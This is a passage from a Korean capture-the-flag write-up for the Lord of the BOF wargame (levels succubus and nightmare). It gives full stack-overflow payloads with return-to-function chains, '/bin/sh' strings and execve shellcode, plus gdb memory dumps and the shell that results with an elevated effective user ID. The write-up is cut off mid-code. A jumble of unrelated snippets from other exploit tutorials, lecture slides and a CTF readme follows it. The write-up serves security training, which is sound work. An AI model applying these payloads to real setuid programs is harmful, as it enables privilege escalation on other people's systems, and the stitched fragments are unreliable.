56 t init_dummy U isprint@@glibc_ T main U memcmp@@glibc_2.0 U memset@@glibc_ b84 b object a88 d p T printchar U printf@@glibc_2.0 U strchr@@glibc_2.0 U strcpy@@glibc_2.0 U system@@glibc_2.0 구한주소를넣어봅시다. -페이로드 [nop 44]+[DO addr]+[gye addr]+[gul addr]+[yut addr]+[mo addr][dummy 4][ret 4][/bin/sh] [zombie_assassin@localhost zombie_assassin]$./succubus "$(python -c 'print "\x90"*44+"\xec\x87\x04\x08 \xbc\x87\x04\x08\x8c\x87\x04\x08\x5c\x87\x04\x08\x24\x87\x04\x08"+"duuu"+"\x94\xfa\xff\xbf"+"bash"')"??\$duuu??ash welcome to the DO! welcome to the GYE! welcome to the GUL! welcome to the YUT! welcome to the MO! sh:??ash: command not found Segmentation fault 사본을만들어서정확한주소를봐야겠습니다. [zombie_assassin@localhost zombie_assassin]$ cp succubus ssccubus [zombie_assassin@localhost zombie_assassin]$ ///bin/sh bash$ exit exit 앞에서삽질 ( 생략됨 ) 을좀했는데뒤에 0x00( 널 ) 이없어서자꾸안된것같습니다. 그러므로 /bin/sh다음에바로널이오는구간을찾아서이용해보겠습니다. [zombie_assassin@localhost zombie_assassin]$./ssccubus "$(python -c 'print "\x90"*44+"\xec\x87\x04\x08 \xbc\x87\x04\x08\x8c\x87\x04\x08\x5c\x87\x04\x08\x24\x87\x04\x08"+"dddd"+"\xa9\xfa\xff\xbf"+"///bin/s h"')"??\$ddddⁿ? //bin/sh welcome to the DO! welcome to the GYE! welcome to the GUL! welcome to the YUT! welcome to the MO! sh: unexpected EOF while looking for ``' sh: -c: line 2: syntax error Segmentation fault (core dumped)
57 zombie_assassin]$ gdb -q ssccubus core Core was generated by ` '. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libc.so.6...done. Reading symbols from /lib/ld-linux.so.2...done. #0 0x in?? () (gdb) x/120bx 0xbffffaa8 0xbffffaa8: 0xc4 0xfa 0xff 0xbf 0x9c 0x83 0x04 0x08 0xbffffab0: 0x4c 0x89 0x04 0x08 0x60 0xae 0x00 0x40 0xbffffab8: 0xbc 0xfa 0xff 0xbf 0x90 0x3e 0x01 0x40 0xbffffac0: 0x02 0x00 0x00 0x00 0xbd 0xfb 0xff 0xbf 0xbffffac8: 0xc8 0xfb 0xff 0xbf 0x00 0x00 0x00 0x00 0xbffffad0: 0x1a 0xfc 0xff 0xbf 0x34 0xfc 0xff 0xbf 0xbffffad8: 0x4d 0xfc 0xff 0xbf 0x6c 0xfc 0xff 0xbf 0xbffffae0: 0x8e 0xfc 0xff 0xbf 0x00 0x00 0x00 0x00 0xbffffae8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffaf0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffaf8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffb00: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffb08: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffb10: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffb18: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 (gdb) x/120bx 0xbffffaa8-10 0xbffffa9e: 0x2f 0x73 0x68 0x00 0x04 0x08 0x02 0x00 0xbffffaa6: 0x00 0x00 0xc4 0xfa 0xff 0xbf 0x9c 0x83 0xbffffaae: 0x04 0x08 0x4c 0x89 0x04 0x08 0x60 0xae 0xbffffab6: 0x00 0x40 0xbc 0xfa 0xff 0xbf 0x90 0x3e 0xbffffabe: 0x01 0x40 0x02 0x00 0x00 0x00 0xbd 0xfb 0xbffffac6: 0xff 0xbf 0xc8 0xfb 0xff 0xbf 0x00 0x00 0xbfffface: 0x00 0x00 0x1a 0xfc 0xff 0xbf 0x34 0xfc 0xbffffad6: 0xff 0xbf 0x4d 0xfc 0xff 0xbf 0x6c 0xfc 0xbffffade: 0xff 0xbf 0x8e 0xfc 0xff 0xbf 0x00 0x00 0xbffffae6: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffaee: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffaf6: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffafe: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffb06: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffb0e: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 (gdb) q [zombie_assassin@localhost zombie_assassin]$./succubus "$(python -c 'print "\x90"*44+"\xec\x87\x04\x08 \xbc\x87\x04\x08\x8c\x87\x04\x08\x5c\x87\x04\x08\x24\x87\x04\x08"+"dddd"+"\x9e\xfa\xff\xbf"+"///bin/s h"')"??\$dddd??//bin/sh welcome to the DO! welcome to the GYE!
58 welcome to the GUL! welcome to the YUT! welcome to the MO! sh: /sh: No such file or directory \x2f를보고저는 /bin/sh의시작점인줄알았는데다시보니 /sh 부분입니다. 주소에서 4를빼주거나 / 를추가합니다. Segmentation fault 곧바로원본에시도하겠습니다. [zombie_assassin@localhost zombie_assassin]$./succubus "$(python -c 'print "\x90"*44+"\xec\x87\x04\x08 \xbc\x87\x04\x08\x8c\x87\x04\x08\x5c\x87\x04\x08\x24\x87\x04\x08"+"dddd"+"\x9e\xfa\xff\xbf"+"///////b in/sh"')"??\$dddd??//////bin/sh welcome to the DO! welcome to the GYE! welcome to the GUL! welcome to the YUT! welcome to the MO! bash$ whoami;id;my-pass succubus uid=516(zombie_assassin) gid=516(zombie_assassin) euid=517(succubus) egid=517(succubus) groups=516(zom bie_assassin) euid = 517 here to stay 쉘코드를이용해서풀수도있습니다. nop44에 DO, GYE, GUL, YUT, MO를호출해도 64byte밖에안되기때문에뒤에버퍼뒤쪽에쉘코드를넣을공간이충분히남아있습니다. system함수의리턴주소에쉘코드의주소를넣고호출합니다. 이전과다르게더미를시스템함수의인자로넣어줍니다. [...]+[MO addr]+[ret 4]+[dummy 4]+[nop+shellcode] [zombie_assassin@localhost zombie_assassin]$./ssccubus "$(python -c 'print "\x90"*44+"\xec\x87\x04\x08 \xbc\x87\x04\x08\x8c\x87\x04\x08\x5c\x87\x04\x08\x24\x87\x04\x08"+"shel"+"ffff"+"\x90"*4+"\x31\xc0\x50 \x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')"??\$shelffff 1?h//shh/bin?S? 것 welcome to the DO! welcome to the GYE! welcome to the GUL! welcome to the YUT! welcome to the MO! Segmentation fault (core dumped) [zombie_assassin@localhost zombie_assassin]$ gdb -q ssccubus core Core was generated by ` '. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libc.so.6...done. Reading symbols from /lib/ld-linux.so.2...done. #0 0x6c in?? () (gdb) x/120bx $esp
59 0xbffffa94: 0x66 0x66 0x66 0x66 0x90 0x90 0x90 0x90 0xbffffa9c: 0x31 0xc0 0x50 0x68 0x2f 0x2f 0x73 0x68 0xbffffaa4: 0x68 0x2f 0x62 0x69 0x6e 0x89 0xe3 0x50 0xbffffaac: 0x53 0x89 0xe1 0x99 0xb0 0x0b 0xcd 0x80 0xbffffab4: 0x00 0xae 0x00 0x40 0xbc 0xfa 0xff 0xbf 0xbffffabc: 0x90 0x3e 0x01 0x40 0x02 0x00 0x00 0x00 0xbffffac4: 0xb6 0xfb 0xff 0xbf 0xc1 0xfb 0xff 0xbf 0xbffffacc: 0x00 0x00 0x00 0x00 0x26 0xfc 0xff 0xbf 0xbffffad4: 0x40 0xfc 0xff 0xbf 0x5f 0xfc 0xff 0xbf 0xbffffadc: 0x81 0xfc 0xff 0xbf 0x96 0xfc 0xff 0xbf 0xbffffae4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffaec: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffaf4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffafc: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffb04: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 (gdb) q 주소를알았으니곧장원본에시도하면.. [zombie_assassin@localhost zombie_assassin]$./succubus "$(python -c 'print "\x90"*44+"\xec\x87\x04\x08 \xbc\x87\x04\x08\x8c\x87\x04\x08\x5c\x87\x04\x08\x24\x87\x04\x08"+"\x9c\xfa\xff\xbf"+"ffff"+"\x90"*4+" \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')"??\$??fff 1?h//shh/bin?S? 것 welcome to the DO! welcome to the GYE! welcome to the GUL! welcome to the YUT! welcome to the MO! bash$ whoami;id;my-pass succubus uid=516(zombie_assassin) gid=516(zombie_assassin) euid=517(succubus) egid=517(succubus) groups=516(zom bie_assassin) euid = 517 here to stay bash$ exit exit 0x12 succubus login: succubus Password: Last login: Thu Mar 15 11:12:32 from [succubus@localhost succubus]$ cat nightmare.c /* The Lord of the BOF : The Fellowship of the BOF - nightmare - PLT
60 */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <dumpcode.h> main(int argc, char *argv[]) char buffer[40]; char *addr; if(argc < 2) printf("argv error\n"); // check address addr = (char *)&strcpy; if(memcmp(argv[1]+44, &addr, 4)!= 0) printf("you must fall in love with strcpy()\n"); // overflow! strcpy(buffer, argv[1]); printf("%s\n", buffer); // dangerous waterfall memset(buffer+40+8, 'A', 4); 소스를보니 strcpy함수로리턴하라고합니다. strcpy() 함수는이곳에서자세히알아볼수있습니다
PowerPoint Template
BoF 원정대서비스 목차 환경구성 http://www.hackerschool.org/hs_boards/zboard.php?id=hs_notice&no=1170881885 전용게시판 http://www.hackerschool.org/hs_boards/zboard.php?id=bof_fellowship Putty War game 2 LOB 란? 해커스쿨에서제공하는
More informationContents 1. 목적 풀이 gate
Lord of Bof 풀이 Moomoo/badass4514@gmail.com 1 Contents 1. 목적 ---------------------------------------------------------------- 3 2. 풀이 gate ----------------------------------------------------------------
More information0x <main+41>: lea eax,[ebp-264] 0x f <main+47>: push eax 0x080484a0 <main+48>: call 0x804835c <strcpy> 0x080484a5 <main+53>: add esp,0x1
FTZ LEVEL11 #include #include int main( int argc, char *argv[] ) { char str[256]; setreuid( 3092, 3092 ); strcpy( str, argv[1] ); printf( str ); gdb 를이용해분석해보면 [level11@ftz level11]$
More informationSmashing the Lord Of the Bof
Smashing the Lord Of the Bof cd80@leaveret 목차 0. LOB 소개 1. Gate -> gremlin 2. Gremlin -> cobolt 3. Cobolt -> goblin 4. Goblin -> orc 5. Orc -> wolfman 6. Wolfman-> darkelf 7. Darkelf -> orge 8. Orge ->
More informationhlogin2
0x02. Stack Corruption off-limit Kernel Stack libc Heap BSS Data Code off-limit Kernel Kernel : OS Stack libc Heap BSS Data Code Stack : libc : Heap : BSS, Data : bss Code : off-limit Kernel Kernel : OS
More information강의10
Computer Programming gdb and awk 12 th Lecture 김현철컴퓨터공학부서울대학교 순서 C Compiler and Linker 보충 Static vs Shared Libraries ( 계속 ) gdb awk Q&A Shared vs Static Libraries ( 계속 ) Advantage of Using Libraries Reduced
More informationLevel 4 ( hell_fire -> evil_wizard ) ~]$ cat evil_wizard.c /* The Lord of the BOF : The Fellowship of the BOF - evil_wizard
Level 4 ( hell_fire -> evil_wizard ) [hell_fire@fedora_1stfloor ~]$ cat evil_wizard.c /* The Lord of the BOF : The Fellowship of the BOF - evil_wizard - Local BOF on Fedora Core 3 - hint : GOT overwriting
More informationDeok9_Exploit Technique
Exploit Technique CodeEngn Co-Administrator!!! and Team Sur3x5F Member Nick : Deok9 E-mail : DDeok9@gmail.com HomePage : http://deok9.sur3x5f.org Twitter :@DDeok9 > 1. Shell Code 2. Security
More informationHistory
[Document Information] Title : History Of Buffer Over Flow VOL. 1 Date : 2007. 3. 28 Author : hardsoju Contact : E-Mail(hardsoju@hanmail.net) 1 [Index] 1. 개요 2. 환경변수의이해 2.1 eggshell 을이용한 root shell 획득
More information2015 CodeGate 풀이보고서 김성우 1. systemshock strcat(cmd, argv[1]); 에서스택버퍼오버플로우가발생합니다
2015 CodeGate 풀이보고서 김성우 rkwk0112@gmail.com http://cd80.tistory.com 1. systemshock strcat(cmd, argv[1]); 에서스택버퍼오버플로우가발생합니다 argv[1] 의주소는스택에있으므로 cmd부터버퍼를오버플로우시켜 argv[1] 이저장된주소까지접근이가능하면 strlen(argv[1]); 시
More informationPoison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3
Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3 Example 3.1 Files 3.2 Source code 3.3 Exploit flow
More informationReusing Dynamic Linker For Exploitation Author : Date : 2012 / 05 / 13 Contact : Facebook : fb.me/kwonpwn
Reusing Dynamic Linker For Exploitation Author : pwn3r @ B10S @WiseGuyz Date : 2012 / 05 / 13 Contact : austinkwon2@gmail.com Facebook : fb.me/kwonpwn3r Abstract 대부분의 Unix 에선공유라이브러리를메모리에로드하고프로그램과 link
More information6주차.key
6, Process concept A program in execution Program code PCB (process control block) Program counter, registers, etc. Stack Heap Data section => global variable Process in memory Process state New Running
More informationReturn-to-libc
Return-to-libc Mini (skyclad0x7b7@gmail.com) 2015-08-22 - INDEX - 1. 개요... - 2-1-1. 서문... - 2-1-2. RTL 공격이란... - 2 - 보호기법... - 3 - Libc 란?... - 4-2. RTL 공격... - 4-2-1. 취약한코드... - 4-2-2. 분석... - 5-2-3.
More informationRTL
All about RTL ( Return To Library ) By Wr4ith [ 목차 ] 1. 개요 2. 등장배경 3. 실습 1. 개요 기존의시스템해킹기법중일부인 BoF/FSB 등은대부분직접만든쉘코드를이용 하여 root 권한을취득하는것이일반적이였다. 하지만 RTL 기법은쉘코드가필요 없는기법이다. RTL 의핵심은함수에필로그과정에서 RET 영역에 libc
More information02.Create a shellcode that executes "/bin/sh" Excuse the ads! We need some help to keep our site up. List Create a shellcode that executes "/bin/sh" C
02.Create a shellcode that executes "/bin/sh" Excuse the ads! We need some help to keep our site up. List Create a shellcode that executes "/bin/sh" C language Assembly code Change permissions(seteuid())
More informationLevel 1. Trivial level1]$ cat hint level2 권한에 setuid 가걸린파일을찾는다. level1]$ find / -user level2 2>/dev/null find / 최상위폴더부터찾겠다. -u
HackerSchool WarGame 풀이 Written by StolenByte http://stolenbyte.egloos.com - 1 - Level 1. Trivial [level1@ftz level1]$ cat hint level2 권한에 setuid 가걸린파일을찾는다. [level1@ftz level1]$ find / -user level2 2>/dev/null
More information윤석언 - Buffer Overflow - 윤석언 제12회세미나 수원대학교보안동아리 FLAG
- Buffer Overflow - 윤석언 SlaxCore@gmailcom 제12회세미나 수원대학교보안동아리 FLAG http://flagsuwonackr - 1 - < BOF(Buffer OverFlow) > - Stack 기반 - Heap 기반 # 기초 : Stack 기반의 BOF 스택 : 기본적으로 2개의 operation(push, pop) 과 1 개의변수(top)
More informationPowerPoint 프레젠테이션
Web server porting 2 Jo, Heeseung Web 을이용한 LED 제어 Web 을이용한 LED 제어프로그램 web 에서데이터를전송받아타겟보드의 LED 를조작하는프로그램을작성하기위해다음과같은소스파일을생성 2 Web 을이용한 LED 제어 LED 제어프로그램작성 8bitled.html 파일을작성 root@ubuntu:/working/web# vi
More informationMicrosoft Word - readme.doc
========================================================= 제 1 회광주과기원정보통신공학과 SW 경진대회 (Hacking 경진대회 ) 대회시작 : 2002 년 8 월 8 일 ( 목 ) 오후 9:00 ( 한국시간, GMT+9:00) 대회종료 : 2002 년 8 월 10 일 ( 토 ) 오후 9:00 ( 한국시간, GMT+9:00)
More information<52544CC0BB20BEC6B4C2B0A12E687770>
RTL 을아는가? 작성일 : 2009/12/01 Written by MaJ3stY ----------------------------------------------------------------------- 목차 0x01 Notice 0x02 RTL 이란? 0x03 공격을직접해보자. 0x04 마치며 -----------------------------------------------------------------------
More informationMicrosoft Word - building the win32 shellcode 01.doc
Win32 Attack 1. Local Shellcode 작성방법 By 달고나 (Dalgona@wowhacker.org) Email: zinwon@gmail.com Abstract 이글은 MS Windows 환경에서 shellcode 를작성하는방법에대해서설명하고있다. Win32 는 *nix 환경과는사뭇다른 API 호출방식을사용하기때문에조금복잡하게둘러서 shellcode
More information01.ROP(Return Oriented Programming)-x86 Excuse the ads! We need some help to keep our site up. List Return Oriented Programming(ROP) -x86 Gadgets - PO
01.ROP(Return Oriented Programming)-x86 Excuse the ads! We need some help to keep our site up. List Return Oriented Programming(ROP) -x86 Gadgets - POP; POP; POP; RET PLT & GOT Debug Proof of concept Example
More informationPowerPoint 프레젠테이션
7-Segment Device Control - Device driver Jo, Heeseung HBE-SM5-S4210 의 M3 Module 에는 6 자리를가지는 7-Segment 모듈이아래그림처럼실장 6 Digit 7-Segment 2 6-Digit 7-Segment LED controller 16비트로구성된 2개의레지스터에의해제어 SEG_Sel_Reg(Segment
More informationPowerPoint 프레젠테이션
7-Segment Device Control - Device driver Jo, Heeseung HBE-SM5-S4210 의 M3 Module 에는 6 자리를가지는 7-Segment 모듈이아래그림처럼실장 6 Digit 7-Segment 2 6-Digit 7-Segment LED Controller 16비트로구성된 2개의레지스터에의해제어 SEG_Sel_Reg(Segment
More informationComputer Security Chapter 08. Format String 김동진 1 Secure Software Lab.
Computer Security Chapter 08. Format Strig 김동진 (kdjorag@gmail.com) http://securesw.dakook.ac.kr/ 1 목차 Format Strig Attack? Format Strig? Format Strig Attack 의원리 입력코드생성 Format Strig Attack (kerel v2.2,
More informationhlogin7
0x07. Return Oriented Programming ROP? , (DEP, ASLR). ROP (Return Oriented Programming) (excutable memory) rop. plt, got got overwrite RTL RTL Chain DEP, ASLR gadget Basic knowledge plt, got call function
More informationSena Technologies, Inc. HelloDevice Super 1.1.0
HelloDevice Super 110 Copyright 1998-2005, All rights reserved HelloDevice 210 ()137-130 Tel: (02) 573-5422 Fax: (02) 573-7710 E-Mail: support@senacom Website: http://wwwsenacom Revision history Revision
More informationPowerPoint 프레젠테이션
KeyPad Device Control - Device driver Jo, Heeseung HBE-SM5-S4210 에는 16 개의 Tack Switch 를사용하여 4 행 4 열의 Keypad 가장착 4x4 Keypad 2 KeyPad 를제어하기위하여 FPGA 내부에 KeyPad controller 가구현 KeyPad controller 16bit 로구성된
More informationPowerPoint 프레젠테이션
7-SEGMENT DEVICE CONTROL - DEVICE DRIVER Jo, Heeseung 디바이스드라이버구현 : 7-SEGMENT HBE-SM5-S4210 의 M3 Module 에는 6 자리를가지는 7-Segment 모듈이아래그림처럼실장 6 Digit 7-Segment 2 디바이스드라이버구현 : 7-SEGMENT 6-Digit 7-Segment LED
More information버퍼오버플로우-왕기초편 10. 메모리를 Hex dump 뜨기 앞서우리는버퍼오버플로우로인해리턴어드레스 (return address) 가변조될수있음을알았습니다. 이제곧리턴어드레스를원하는값으로변경하는실습을해볼것인데요, 그전에앞서, 메모리에저장된값들을살펴보는방법에대해배워보겠습
앞서우리는버퍼오버플로우로인해리턴어드레스 (return address) 가변조될수있음을알았습니다. 이제곧리턴어드레스를원하는값으로변경하는실습을해볼것인데요, 그전에앞서, 메모리에저장된값들을살펴보는방법에대해배워보겠습니다. 여러분모두 Windows 에서 hex editor(hex dump, hex viewer) 라는것을사용해보셨을겁니다. 바로바이너리파일을 16 진수
More information제 14 장포인터활용 유준범 (JUNBEOM YOO) Ver 본강의자료는생능출판사의 PPT 강의자료 를기반으로제작되었습니다.
제 14 장포인터활용 유준범 (JUNBEOM YOO) Ver. 2.0 jbyoo@konkuk.ac.kr http://dslab.konkuk.ac.kr 본강의자료는생능출판사의 PPT 강의자료 를기반으로제작되었습니다. 이번장에서학습할내용 이중포인터란무엇인가? 포인터배열 함수포인터 다차원배열과포인터 void 포인터 포인터는다양한용도로유용하게활용될수있습니다. 2 이중포인터
More informationMicrosoft PowerPoint - chap02-C프로그램시작하기.pptx
#include int main(void) { int num; printf( Please enter an integer "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; } 1 학습목표 을 작성하면서 C 프로그램의
More information<B1E2BCFAB9AEBCAD5FB9DABAB4B1D45F F F64746F72732E687770>
기술문서 09. 11. 3. 작성 Format String Bug 에서 dtors 우회 작성자 : 영남대학교 @Xpert 박병규 preex@ynu.ac.kr 1. 요약... 2 2. d to r 이란... 3 3. 포맷스트링... 4 4. ro o t 권한획득... 7 5. 참고자료... 1 0-1 - 1. 요약 포맷스트링버그 (Format String bug)
More informationMicrosoft Word - Reverse Engineering Code with IDA Pro-2-1.doc
Reverse Engineering Code with IDA Pro By Dan Kaminsky, Justin Ferguson, Jason Larsen, Luis Miras, Walter Pearce 정리 : vangelis(securityproof@gmail.com) 이글은 Reverse Engineering Code with IDA Pro(2008년출판
More informationPowerPoint 프레젠테이션
(Host) set up : Linux Backend RS-232, Ethernet, parallel(jtag) Host terminal Target terminal : monitor (Minicom) JTAG Cross compiler Boot loader Pentium Redhat 9.0 Serial port Serial cross cable Ethernet
More information<4D F736F F F696E74202D20B8B6C0CCC5A9B7CEC7C1B7CEBCBCBCAD202839C1D6C2F7207E203135C1D6C2F >
10주차 문자 LCD 의인터페이스회로및구동함수 Next-Generation Networks Lab. 5. 16x2 CLCD 모듈 (HY-1602H-803) 그림 11-18 19 핀설명표 11-11 번호 분류 핀이름 레벨 (V) 기능 1 V SS or GND 0 GND 전원 2 V Power DD or V CC +5 CLCD 구동전원 3 V 0 - CLCD 명암조절
More informationPowerPoint 프레젠테이션
Network Programming Jo, Heeseung Network 실습 네트워크프로그래밍 멀리떨어져있는호스트들이서로데이터를주고받을수있도록프로그램을구현하는것 파일과는달리데이터를주고받을대상이멀리떨어져있기때문에소프트웨어차원에서호스트들간에연결을해주는장치가필요 이러한기능을해주는장치로소켓이라는인터페이스를많이사용 소켓프로그래밍이란용어와네트워크프로그래밍이랑용어가같은의미로사용
More information/chroot/lib/ /chroot/etc/
구축 환경 VirtualBox - Fedora 15 (kernel : 2.6.40.4-5.fc15.i686.PAE) 작동 원리 chroot유저 ssh 접속 -> 접속유저의 홈디렉토리 밑.ssh의 rc 파일 실행 -> daemonstart실행 -> daemon 작동 -> 접속 유저만의 Jail 디렉토리 생성 -> 접속 유저의.bashrc 의 chroot 명령어
More informationFedora Core 3,4,5 stack overflow.docx
Fedora Core 3,4,5 stack overflow - www.hackerschool.org - - by randomkid - +------------------------------ 목차 ----------------------------------+ 1. 스택오버플로우의역사 2. 커널 2.4 에서의 stack overflow 방법 (shellcode
More informationMPLAB C18 C
MPLAB C18 C MPLAB C18 MPLAB C18 C MPLAB C18 C #define START, c:\mcc18 errorlevel{0 1} char isascii(char ch); list[list_optioin,list_option] OK, Cancel , MPLAB IDE User s Guide MPLAB C18 C
More informationPowerPoint 프레젠테이션
Chapter 05. 코드보안 : 코드속에뒷길을만드는기술 1. 시스템과프로그램에대한이해 2. 버퍼오버플로우공격 3. 포맷스트링공격 시스템메모리의구조 어떤프로그램을동작시키면메모리에프로그램이동작하기위한가상의메모리공간이생성됨. 그메모리공간은다시목적에따라상위메모리와하위메모리로나눔. [ 그림 5-2] 메모리의기본구조 스택영역과힙영역 상위메모리 : 스택 (Stack)
More informationvi 사용법
유닉스프로그래밍및실습 gdb 사용법 fprintf 이용 단순디버깅 확인하고자하는코드부분에 fprintf(stderr, ) 를이용하여그지점까지도달했는지여부와관심있는변수의값을확인 여러유형의단순한문제를확인할수있음 그러나자세히살펴보기위해서는디버깅툴필요 int main(void) { int count; long large_no; double real_no; init_vars();
More informationMicrosoft PowerPoint - ch04_코드 보안 [호환 모드]
이장에서다룰내용 1 2 3 컴퓨터의기본구조를살펴본다. 기계어수준에서의프로그램동작을이해한다. 버퍼오버플로우와포맷스트링공격을알아본다. 정보보안개론 4 장 Section 01 시스템과프로그램에대한이해 Section 01 시스템과프로그램에대한이해 시스템메모리구조 프로그램을동작시키면메모리에프로그램이동작하기위한가상의메모리공간이생성되며, 이메모리공간은다시그목적에따라상위,
More informationINTRO Basic architecture of modern computers Basic and most used assembly instructions on x86 Installing an assembly compiler and RE tools Practice co
Basic reverse engineering on x86 This is for those who want to learn about basic reverse engineering on x86 (Feel free to use this, email me if you need a keynote version.) v0.1 SeungJin Beist Lee beist@grayhash.com
More informationAdobe Flash 취약점 분석 (CVE-2012-0754)
기술문서 14. 08. 13. 작성 GNU C library dynamic linker $ORIGIN expansion Vulnerability Author : E-Mail : 윤지환 131ackcon@gmail.com Abstract 2010 년 Tavis Ormandy 에 의해 발견된 취약점으로써 정확한 명칭은 GNU C library dynamic linker
More informationMicrosoft Word - FunctionCall
Function all Mechanism /* Simple Program */ #define get_int() IN KEYOARD #define put_int(val) LD A val \ OUT MONITOR int add_two(int a, int b) { int tmp; tmp = a+b; return tmp; } local auto variable stack
More informationMicrosoft PowerPoint - ch04_코드 보안 [호환 모드]
정보보안개론 4 장 이장에서다룰내용 1 컴퓨터의기본구조를살펴본다. 2 기계어수준에서의프로그램동작을이해한다. 2 3 버퍼오버플로우와포맷스트링공격을알아본다. Section 01 시스템과프로그램에대한이해 v 시스템메모리구조 프로그램을동작시키면메모리에프로그램이동작하기위한가상의메모리공간이 생성되며, 이메모리공간은다시그목적에따라상위, 하위메모리로나뉨. 상위메모리 : 스택
More informationABC 11장
12 장고급응용 0 수행중인프로그램 프로세스 모든프로세스는유일한프로세스식별번호 (PID) 를가짐 유닉스에서는 ps 명령을사용하여프로세스목록을볼수있음 12-1 프로세스 $ ps -aux USER PID %CPU %MEM SZ RSS TT STAT START TIME COMMAND blufox 17725 34.0 1.6 146 105 i2 R 15:13 0:00
More informationRemote Buffer Overflow & Format String 2012 년 8 월 6 일월요일 오후 6:32 ================================================================ Title: Remote Buffer
Remote Buffer Overflow & Format String 2012 년 8 월 6 일월요일 오후 6:32 ================================================================ Title: Remote Buffer Overflow & Format String :-) Author : 유동훈 (Xpl017Elz)
More informationBOF Foundation.doc
해커지망자들이알아야할 Buffer Overflow Attack 의기초 What every applicant for the hacker should know about the foundation of buffer overflow attacks By 달고나 (Dalgona@wowhacker.org) Email: zinwon@gmail.com 2005 년 9월 5일
More information<4D F736F F F696E74202D20B8AEB4AABDBA20BFC0B7F920C3B3B8AEC7CFB1E22E BC8A3C8AF20B8F0B5E55D>
리눅스 오류처리하기 2007. 11. 28 안효창 라이브러리함수의오류번호얻기 errno 변수기능오류번호를저장한다. 기본형 extern int errno; 헤더파일 라이브러리함수호출에실패했을때함수예 정수값을반환하는함수 -1 반환 open 함수 포인터를반환하는함수 NULL 반환 fopen 함수 2 유닉스 / 리눅스 라이브러리함수의오류번호얻기 19-1
More information학번 : 이름 : 1. 다음파일트리구조를가진유닉스시스템이있다고가정하자. / /bin/ /home/ /home/taesoo/ /usr/ /usr/lib/ /usr/local/lib /media 모든폴더에파일이하나도없다고가정했을때사용자가터미널에서다음 ls 명령입력시화면출력
학번 : 이름 : 1. 다음파일트리구조를가진유닉스시스템이있다고가정하자. / /bin/ /home/ /home/taesoo/ /usr/ /usr/lib/ /usr/local/lib /media 모든폴더에파일이하나도없다고가정했을때사용자가터미널에서다음 ls 명령입력시화면출력을예측하시오. $ cd /usr $ ls..? $ ls.? 2. 다음그림은어떤프로세스가다음코드를수행했다는가정에서도시되었다.
More informationSRC PLUS 제어기 MANUAL
,,,, DE FIN E I N T R E A L L O C E N D SU B E N D S U B M O TIO
More informationMicrosoft PowerPoint - lab14.pptx
Mobile & Embedded System Lab. Dept. of Computer Engineering Kyung Hee Univ. Keypad Device Control in Embedded Linux HBE-SM5-S4210 에는 16 개의 Tack Switch 를사용하여 4 행 4 열의 Keypad 가장착되어있다. 2 Keypad Device Driver
More information컴파일러
YACC 응용예 Desktop Calculator 7/23 Lex 입력 수식문법을위한 lex 입력 : calc.l %{ #include calc.tab.h" %} %% [0-9]+ return(number) [ \t] \n return(0) \+ return('+') \* return('*'). { printf("'%c': illegal character\n",
More informationPowerPoint 프레젠테이션
Web server porting 2 Jo, Heeseung Web 을이용한 LED 제어 Web 을이용한 LED 제어프로그램 web 에서데이터를전송받아타겟보드의 LED 를조작하는프로그램을작성하기위해다음과같은소스파일을생성 2 Web 을이용한 LED 제어 LED 제어프로그램작성 8bitled.html 파일을작성 root@ubuntu:/working/web# vi
More information본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인
스마일서브 CLOUD_Virtual 워드프레스 설치 (WORDPRESS INSTALL) 스마일서브 가상화사업본부 Update. 2012. 09. 04. 본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게
More information제1장 Unix란 무엇인가?
1 12 장파이프 2 12.1 파이프 파이프원리 $ who sort 파이프 3 물을보내는수도파이프와비슷 한프로세스는쓰기용파일디스크립터를이용하여파이프에데이터를보내고 ( 쓰고 ) 다른프로세스는읽기용파일디스크립터를이용하여그파이프에서데이터를받는다 ( 읽는다 ). 한방향 (one way) 통신 파이프생성 파이프는두개의파일디스크립터를갖는다. 하나는쓰기용이고다른하나는읽기용이다.
More informationNo Slide Title
